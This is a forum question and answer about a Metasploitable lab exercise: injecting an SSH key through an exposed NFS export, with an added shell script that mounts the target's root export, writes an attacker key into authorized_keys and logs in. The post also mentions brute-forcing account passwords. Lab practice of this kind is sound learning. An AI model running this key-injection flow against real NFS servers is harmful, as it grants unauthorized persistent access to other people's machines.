Apologies if the question is really simple, however I have not been able to find a solution yet.

I am exploring the exploitation potential of Kali Linux on the popular Metasploitable vulnerable server. This is done through connecting the two via a NAT Network in Virtualbox.

I have completed a Nessus scan and it revealed that the Metasploitable machine is vulnerable to NFS mounting exploits. I researched this further and it seemed like an easy way to gain password-less access via SSH.

I have already gained access through SSH by brute forcing the password to three accounts (user, postgres and msfadmin), however, I wanted to go a step further and understand how NFS can lead to vulnerabilities.

I followed the steps in this tutorial: https://www.youtube.com/watch?v=i0_t3zl_X_E

I used ssh-keygen to generate a new RSA key:

[image: ssh-keygen output]

I copied the RSA key into Metasploitable's authorized_keys file

[image: copying the key into authorized_keys]

I verified that the new key was added on the metasploitable side:

[image: verification on the Metasploitable side]

Now I should (according to the video) be able to login via ssh using ssh [email protected] after unmounting the file

I get the following error:

[image: ssh error message]

I have researched why this may be happening, and one answer I found was to do with file permissions, or using the command setsebool -P use_nfs_home_dirs 1

I tried using chmod to change the permissions but this did not work, and ended up breaking the VM at some point (goes to show my lack of understanding, but trying all the different chmod options without a clue as to which one will work might take a long time).

setsebool didn't work either, as I couldn't install the package it is in using apt-get install policycoreutils (404 error, try using apt-get update or --fix-missing).

However, clearly I am able to SSH into the system through the use of the cracked passwords, although I still get the same error UNTIL I use the flag -oHostKeyAlgorithms=+ssh-rsa. Note that this does not work when added to ssh [email protected], only when using ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]

Essentially, I want to know why SSH can't recognise that my public key is already in the authorized_keys file.

Many thanks to anyone able to point me in the right direction.

1 Answer

I want to know why SSH can't recognise that my public key is already in the authorized_keys file

On the one hand, the error message you get is talking about the host key – not the one you're using, but the one that the server identifies with (and which goes into your 'known_hosts' file). The sshd service on that VM only supports old signature algorithms that the new client no longer accepts.

On the other hand, the same algorithms are supported for both directions. If the server does not support rsa-sha2 for signing with its host key, then it also doesn't support rsa-sha2 for verifying signatures you send from your user key. So it's not enough to only allow the old ssh-rsa via HostKeyAlgorithms – you also need to allow it through PubkeyAcceptedAlgorithms, otherwise the client won't even offer its own key as it thinks all available algorithms are not supported.

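The two-sided fix the answer describes, as an added shell example that is not part of the original question or answer. It assumes the Metasploitable root export is already mounted somewhere (the mount point, target IP and the msfadmin uid/gid are placeholders you must replace), and that the client is a current OpenSSH (8.8 or newer, where SHA-1 ssh-rsa signatures are disabled by default) talking to the old sshd on the VM, which only offers ssh-rsa. Besides the two -o options it also fixes the directory and file permissions sshd's StrictModes checks, which is the other common reason a key that is visibly present in authorized_keys is still ignored:

```shell
#!/bin/sh
# Added example, not the original poster's code.
# Assumed placeholders:
#   MSF_HOST  - IP of the Metasploitable VM (e.g. 10.0.2.4)
#   MNT       - where the NFS export of / is mounted (e.g. /mnt/msf)
#   TARGET_UID/TARGET_GID - uid/gid of the account on the VM; the file we
#               write must be owned by that user or sshd (StrictModes) rejects it

# ssh-rsa must be re-enabled for BOTH directions: the server signs its host key
# with it (HostKeyAlgorithms) and must verify our user-key signature with it
# (PubkeyAcceptedAlgorithms). Clients older than OpenSSH 8.5 spell the second
# option PubkeyAcceptedKeyTypes.
legacy_ssh_opts() {
    printf '%s' '-oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa'
}

# Same thing as a persistent ~/.ssh/config stanza, so plain `ssh msfadmin@HOST` works.
ssh_config_stanza() {
    host="$1"
    printf 'Host %s\n    HostKeyAlgorithms +ssh-rsa\n    PubkeyAcceptedAlgorithms +ssh-rsa\n' "$host"
}

# inject_key HOME_DIR PUBKEY_FILE UID GID
# Appends the public key to authorized_keys below HOME_DIR (the user's home as
# seen through the NFS mount) and sets the ownership and modes sshd insists on:
# ~/.ssh 700, authorized_keys 600, both owned by the login user.
# Idempotent: the key is appended only if its base64 blob is not already there.
inject_key() {
    home="$1"; pub="$2"; uid="$3"; gid="$4"
    blob="$(cut -d' ' -f2 "$pub")"
    mkdir -p "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    if ! grep -qF -- "$blob" "$home/.ssh/authorized_keys"; then
        cat "$pub" >> "$home/.ssh/authorized_keys"
    fi
    chmod 700 "$home/.ssh"
    chmod 600 "$home/.ssh/authorized_keys"
    chown "$uid:$gid" "$home/.ssh" "$home/.ssh/authorized_keys" \
        || echo "warning: chown failed; authorized_keys must be owned by the target user" >&2
}

# Count how many times a key blob appears (used to confirm idempotence).
key_count() {
    grep -cF -- "$(cut -d' ' -f2 "$2")" "$1/.ssh/authorized_keys"
}

# Full flow; runs only when MSF_HOST is set so the functions above can be
# sourced and tested without a target.
if [ -n "${MSF_HOST:-}" ]; then
    MNT="${MNT:-/mnt/msf}"
    TARGET_UID="${TARGET_UID:-1000}"   # assumed; check with `id msfadmin` over SSH
    TARGET_GID="${TARGET_GID:-1000}"
    mkdir -p "$MNT"
    mount -t nfs "$MSF_HOST:/" "$MNT"
    inject_key "$MNT/home/msfadmin" "$HOME/.ssh/id_rsa.pub" "$TARGET_UID" "$TARGET_GID"
    umount "$MNT"
    # shellcheck disable=SC2046  # options are intentionally word-split
    ssh $(legacy_ssh_opts) -i "$HOME/.ssh/id_rsa" "msfadmin@$MSF_HOST" id
fi
```

If it still fails, run the same ssh command with -vv: a line like "Offering public key: ... RSA" followed by "Server accepts key" confirms the client is now offering the key and the server is verifying it; if the key is offered but never accepted, the problem is on the server side (ownership, modes, or a world-writable home directory), not the algorithm.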
